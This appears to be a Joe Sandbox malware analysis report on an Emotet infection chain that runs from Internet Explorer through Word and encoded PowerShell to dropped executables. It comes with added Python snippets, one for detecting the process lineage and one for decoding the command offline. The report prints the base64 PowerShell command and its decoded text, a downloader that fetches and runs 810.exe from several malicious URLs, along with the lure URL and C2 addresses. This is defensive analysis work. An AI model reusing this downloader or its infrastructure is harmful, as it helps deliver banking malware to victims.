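# chain this report lists under "Spawns processes".
EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": "iexplore.exe -Embedding"},
    {"pid": 2, "ppid": 1, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": "iexplore.exe SCOD EF:2320 CREDAT:275457 /prefetch:2".replace("SCOD EF", "SCODEF")},
    {"pid": 3, "ppid": 2, "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r"WINWORD.EXE /n C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc"},
    {"pid": 4, "ppid": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7"},
    {"pid": 5, "ppid": 4, "image": r"C:\Users\user\810.exe", "cmdline": r"C:\Users\user\810.exe"},
    {"pid": 6, "ppid": 5, "image": r"C:\Users\user\810.exe", "cmdline": r"C:\Users\user\810.exe"},
    {"pid": 7, "ppid": 6, "image": r"C:\Windows\System32\startedradar.exe",
     "cmdline": r"C:\Windows\system32\startedradar.exe"},
    {"pid": 8, "ppid": 7, "image": r"C:\Windows\System32\startedradar.exe",
     "cmdline": r"C:\Windows\system32\startedradar.exe"},
]

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# A flag is "-" or "/" followed by letters, delimited by whitespace.
FLAG_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)(?=\s|$)")


def basename(image):
    return ntpath.basename(image).lower()


def has_encoded_command(cmdline):
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    for flag in FLAG_RE.findall(cmdline):
        f = flag.lower()
        if f == "ec" or "encodedcommand".startswith(f):
            return True
    return False


def build_index(events):
    return {e["pid"]: e for e in events}


def chain(index, pid):
    """Root-to-leaf lineage of a pid as 'parent > child > ...' image names."""
    names = []
    while pid in index:
        names.append(ntpath.basename(index[pid]["image"]))
        pid = index[pid]["ppid"]
    return " > ".join(reversed(names))


def detect(events):
    index = build_index(events)
    findings = []
    for e in events:
        parent = index.get(e["ppid"])
        if parent is None:
            continue
        child, par = basename(e["image"]), basename(parent["image"])
        hits = []
        if par in BROWSERS and child in OFFICE:
            hits.append("browser_spawns_office")
        if par in OFFICE and child in SCRIPT_HOSTS:
            hits.append("office_spawns_script_host")
        if child == "powershell.exe" and has_encoded_command(e["cmdline"]):
            hits.append("powershell_encoded_command")
        if (e["image"].lower().startswith("c:\\windows\\system32\\")
                and parent["image"].lower().startswith("c:\\users\\")):
            hits.append("system32_child_of_user_profile_binary")
        for rule in hits:
            findings.append({"rule": rule, "pid": e["pid"], "chain": chain(index, e["pid"])})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f['rule']:40} pid={f['pid']}  {f['chain']}")
```

The parent/child rules are deliberately narrow: the interesting signal in this report is not any single process but the ordered lineage, which is why each finding carries the full chain rather than just the offending pid.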
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Found graphical window changes (likely an installer)
Source: Window Recorder; Window detected: More than 3 window changes detected
Uses Microsoft Silverlight (the file opened is the .NET Framework 2.0 resource DLL mscorrc.dll, not a Silverlight component, so this signature is a false positive here)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR DLLs
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: l5gXiD5DD2Qlu5.pdb source: 810.exe.4.dr
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.1668557236.03EB0000.00000002.sdmp

Data Obfuscation:

PowerShell case anomaly found
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e 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
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e 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
Contains functionality to dynamically determine API calls
Source: C:\Users\user\810.exe; Code function: 6_2_00401A36 LoadLibraryA,GetProcAddress,6_2_00401A36
PE file contains sections with non-standard names
Source: 810.exe.4.dr; Static PE information: section name: .v0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\810.exe; Code function: 6_2_003E57E6 push C2680041h; ret 6_2_003E5BC8
Source: C:\Users\user\810.exe; Code function: 6_2_003E57DB push C2680041h; ret 6_2_003E5BC8
Source: C:\Users\user\810.exe; Code function: 6_2_0040BB02 push edi; retf 6_2_0040BB05
Source: C:\Users\user\810.exe; Code function: 7_2_000F57DB push C2680041h; ret 7_2_000F5BC8
Source: C:\Users\user\810.exe; Code function: 7_2_000F57E6 push C2680041h; ret 7_2_000F5BC8
Source: C:\Users\user\810.exe; Code function: 7_2_0011BB02 push edi; retf 7_2_0011BB05
Source: C:\Windows\System32\startedradar.exe; Code function: 8_2_002857E6 push C2680041h; ret 8_2_00285BC8
Source: C:\Windows\System32\startedradar.exe; Code function: 8_2_002857DB push C2680041h; ret 8_2_00285BC8
Source: C:\Windows\System32\startedradar.exe; Code function: 8_2_002ABB02 push edi; retf 8_2_002ABB05
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_000F57DB push C2680041h; ret 9_2_000F5BC8
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_000F57E6 push C2680041h; ret 9_2_000F5BC8
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_0011BB02 push edi; retf 9_2_0011BB05
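The powershell.exe command line flagged here (and listed in full under "Spawns processes") is a `-e` argument: base64 over a UTF-16LE script, in which the download URLs are chopped into `'..'+'..'` fragments and joined into one string that is then split on `@`. The Python below is an added example and not part of the Joe Sandbox report. It decodes the argument offline without executing anything, folds the concatenations to a fixed point and pulls the URL list out of the `.Split('@')` expression. The blob is copied from this report's process-creation line; because the page cuts it off mid-stream, the decoder drops the incomplete trailing base64 group and any dangling odd byte. The part of the script after `$YF4h4N=('` (the download-and-run loop that, per the report, wrote C:\Users\user\810.exe) is not on the page and is not reconstructed.

```python
import base64
import re

# Copied from this report's process-creation line (powershell.exe POwershell -e ...).
# The page truncates the argument, so this blob is incomplete on purpose.
ENCODED_COMMAND = (
    "JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJ"
)

# 'a'+'b' with optional whitespace around the plus; folded repeatedly below.
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# ('x@y@z').Split('@')  ->  body and separator
SPLIT_LIST_RE = re.compile(r"\('([^']*)'\)\.Split\('(.)'\)", re.I)


def decode_encoded_command(blob):
    """Decode a PowerShell -EncodedCommand argument: base64 over UTF-16LE text.
    A truncated blob is handled by dropping the incomplete trailing base64 group
    and ignoring a dangling odd byte."""
    blob = re.sub(r"\s+", "", blob)
    blob = blob[: len(blob) - len(blob) % 4]
    return base64.b64decode(blob).decode("utf-16-le", errors="ignore")


def fold_concatenations(script):
    """Collapse 'a'+'b'+'c' chains into 'abc' until nothing changes (static, no eval)."""
    while True:
        folded = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if folded == script:
            return script
        script = folded


def extract_url_list(script):
    """Return the http(s) entries of every ('...').Split('x') list in the script."""
    urls = []
    for body, sep in SPLIT_LIST_RE.findall(script):
        urls.extend(p for p in body.split(sep) if re.match(r"https?://", p, re.I))
    return urls


def analyze_encoded_command(blob):
    script = fold_concatenations(decode_encoded_command(blob))
    return {"script": script, "urls": extract_url_list(script)}


if __name__ == "__main__":
    result = analyze_encoded_command(ENCODED_COMMAND)
    print(result["script"])
    for url in result["urls"]:
        print("download candidate:", url)
```

Folding is done with a regular expression rather than by running the script in a PowerShell host because the point is to recover indicators from a sample without giving it a chance to execute; for scripts that build strings with format operators, `-join`, or `[char]` arrays the folding step needs more rules, but the decode-then-fold-then-split shape stays the same.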

Persistence and Installation Behavior:

Drops executables to the Windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\startedradar.exe; Executable created and started: C:\Windows\System32\startedradar.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\810.exe
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\810.exe
Drops PE files to the Windows directory (C:\Windows)
Source: C:\Users\user\810.exe; PE file moved: C:\Windows\System32\startedradar.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\810.exe
Contains functionality to start Windows services
Source: C:\Users\user\810.exe; Code function: 7_2_0011FE73 StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_0011FE73

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (Zone.Identifier)
Source: C:\Users\user\810.exe; File opened: C:\Windows\system32\startedradar.exe:Zone.Identifier read attributes | delete
Starts Microsoft Word (often done so the user does not notice that something is wrong)
Source: C:\Program Files\Internet Explorer\iexplore.exe; Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Checks the free space of hard drives
Source: C:\Users\user\810.exe; File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate running services
Source: C:\Users\user\810.exe; Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW,7_2_0011FA77
Source: C:\Users\user\810.exe; Code function: EnumServicesStatusExW,GetLastError,7_2_0011FA14
Source: C:\Windows\System32\startedradar.exe; Code function: EnumServicesStatusExW,GetLastError,9_2_0011FA14
Source: C:\Windows\System32\startedradar.exe; Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW,9_2_0011FA77
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Found large amount of non-executed APIs
Source: C:\Users\user\810.exe; API coverage: 7.9 %
Source: C:\Windows\System32\startedradar.exe; API coverage: 3.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\810.exe TID: 3804; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\startedradar.exe TID: 2516; Thread sleep time: -60000s >= -30000s
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; System information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\810.exe; Code function: 6_2_00401A36 LoadLibraryA,GetProcAddress,6_2_00401A36
Contains functionality to read the PEB
Source: C:\Users\user\810.exe; Code function: 6_2_00401550 mov eax, dword ptr fs:[00000030h] 6_2_00401550
Source: C:\Users\user\810.exe; Code function: 7_2_00111550 mov eax, dword ptr fs:[00000030h] 7_2_00111550
Source: C:\Windows\System32\startedradar.exe; Code function: 8_2_002A1550 mov eax, dword ptr fs:[00000030h] 8_2_002A1550
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_00111550 mov eax, dword ptr fs:[00000030h] 9_2_00111550
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\810.exe; Code function: 6_2_003E2513 GetProcessHeap,GetProcessHeap,RtlAllocateHeap,lstrcmp,GetProcessHeap,HeapFree,6_2_003E2513
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: unknown; Process created: Base64 decoded $W9i2nI=('JlI'+'RB'+'JH');$IA95Y881=new-object Net.WebClient;$VPiZUTX=('http://'+'b'+'orsa'+'cat'+'.'+'c'+'om/9onr'+'kq'+'J@http'+':/'+'/chileve'+'n'+'.com/YAsy'+'S'+'0Mslz'+'@ht'+'tp:'+'//hu'+'y'+'u'+'s'+'ho'+'p'+'.com'+'/P2ryBfybD@h'+'ttp:/'+'/fat'+'re'+'cip'+'esdoc'+'.com/I20c'+'l'+'Mx8@ht'+'tp://id'+'jvn'+'.'+'com/eU'+'BrJ'+'ig7').Split('@');$YF4h4N=('jP9vP'+'03');$OHR2phSX = ('81'+'0');$UsYIQK=('c10F'+'It');$SNPwZfwZ=$env:userprofile+'\'+$OHR2phSX+('.'+'exe');foreach($mh1azSPq in $VPiZUTX){try{$
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: Base64 decoded $W9i2nI=('JlI'+'RB'+'JH');$IA95Y881=new-object Net.WebClient;$VPiZUTX=('http://'+'b'+'orsa'+'cat'+'.'+'c'+'om/9onr'+'kq'+'J@http'+':/'+'/chileve'+'n'+'.com/YAsy'+'S'+'0Mslz'+'@ht'+'tp:'+'//hu'+'y'+'u'+'s'+'ho'+'p'+'.com'+'/P2ryBfybD@h'+'ttp:/'+'/fat'+'re'+'cip'+'esdoc'+'.com/I20c'+'l'+'Mx8@ht'+'tp://id'+'jvn'+'.'+'com/eU'+'BrJ'+'ig7').Split('@');$YF4h4N=('jP9vP'+'03');$OHR2phSX = ('81'+'0');$UsYIQK=('c10F'+'It');$SNPwZfwZ=$env:userprofile+'\'+$OHR2phSX+('.'+'exe');foreach($mh1azSPq in $VPiZUTX){try{$
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\810.exe 'C:\Users\user\810.exe'
Source: C:\Users\user\810.exe; Process created: C:\Users\user\810.exe C:\Users\user\810.exe
Source: C:\Windows\System32\startedradar.exe; Process created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exe
Very long cmdline option found; this is very uncommon (the option may be encrypted or packed)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJ
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e [encoded command line identical to the preceding entry]

Language, Device and Operating System Detection:

Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number, etc.) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\810.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\startedradar.exe; Queries volume information: C:\ VolumeInformation
Contains functionality to query time zone information
Source: C:\Users\user\810.exe; Code function: 6_2_00D0332D GetVersion,GetVersion,GetLargePageMinimum,GetTimeZoneInformation,GetTimeZoneInformation,CloseHandle,IsTokenRestricted,IsTokenRestricted,VarCyFromR4,6_2_00D0332D
Contains functionality to query windows version
Source: C:\Users\user\810.exe; Code function: 6_2_00D013D2 GetVersion,6_2_00D013D2
Queries the cryptographic machine GUID
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connections (possibly a backdoor)
Source: C:\Users\user\810.exe; Code function: 6_2_00D0257B GetVersion,RemoveFontMemResourceEx,RemoveFontMemResourceEx,RemoveClipboardFormatListener,AllocateUserPhysicalPages,AllocateUserPhysicalPages,GetGuiResources,SwitchToThread,6_2_00D0257B
Source: C:\Users\user\810.exe; Code function: 6_1_00D0257B GetVersion,RemoveFontMemResourceEx,RemoveFontMemResourceEx,RemoveClipboardFormatListener,AllocateUserPhysicalPages,AllocateUserPhysicalPages,GetGuiResources,SwitchToThread,6_1_00D0257B

Behavior Graph

Behavior Graph ID: 785940
URL: http://leonfurniturestore.com/sec.myacc.resourses.biz/
Startdate: 12/02/2019
Architecture: WINDOWS
Score: 80

Process tree recovered from the graph (the counters shown beside a process node in the graph are kept in parentheses):

  • Sample URL
    • Signatures: Encrypted powershell cmdline option found; PowerShell case anomaly found
    • started: iexplore.exe (7 63)
      • started: WINWORD.EXE (54 20)
        • Signatures: Encrypted powershell cmdline option found; Document exploit detected (process start blacklist hit); PowerShell case anomaly found
        • started: powershell.exe (12 7)
          • DNS/IP: borsacat.com 185.2.4.75, 49231, 80 SIMPLYTRANSITGB Italy
          • Dropped file: C:\Users\user\810.exe, PE32
          • Signatures: Drops PE files to the user root directory; Powershell connects to network; Powershell drops PE file
          • started: 810.exe
            • Signatures: Detected Emotet e-Banking trojan
            • started: 810.exe (1)
              • Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
      • started: iexplore.exe (13)
        • DNS/IP: www.leonfurniturestore.com; leonfurniturestore.com 184.175.67.101, 443, 49222, 49223 CYBERCON-CYBERCONINCUS United States; a767.dscg3.akamai.net
    • started: startedradar.exe
      • Signatures: Detected Emotet e-Banking trojan; Drops executables to the windows directory (C:\Windows) and starts them
      • started: startedradar.exe
        • DNS/IP: 181.15.224.57, 49236, 80 TelecomArgentinaSAAR Argentina; 184.101.191.86, 443 CENTURYLINK-US-LEGACY-QWEST-QwestCommunicationsCompany United States

Simulations

Behavior and APIs

Time | Type | Description
20:12:34 | API Interceptor | 251x Sleep call for process: iexplore.exe modified
20:12:55 | API Interceptor | 1x Sleep call for process: powershell.exe modified
20:13:14 | API Interceptor | 2x Sleep call for process: 810.exe modified
20:13:22 | API Interceptor | 2x Sleep call for process: startedradar.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
7.2.810.exe.f0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.2.810.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
9.2.startedradar.exe.110000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
8.2.startedradar.exe.2a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
8.2.startedradar.exe.280000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
7.2.810.exe.110000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
9.2.startedradar.exe.f0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.2.810.exe.3e0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs


Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails
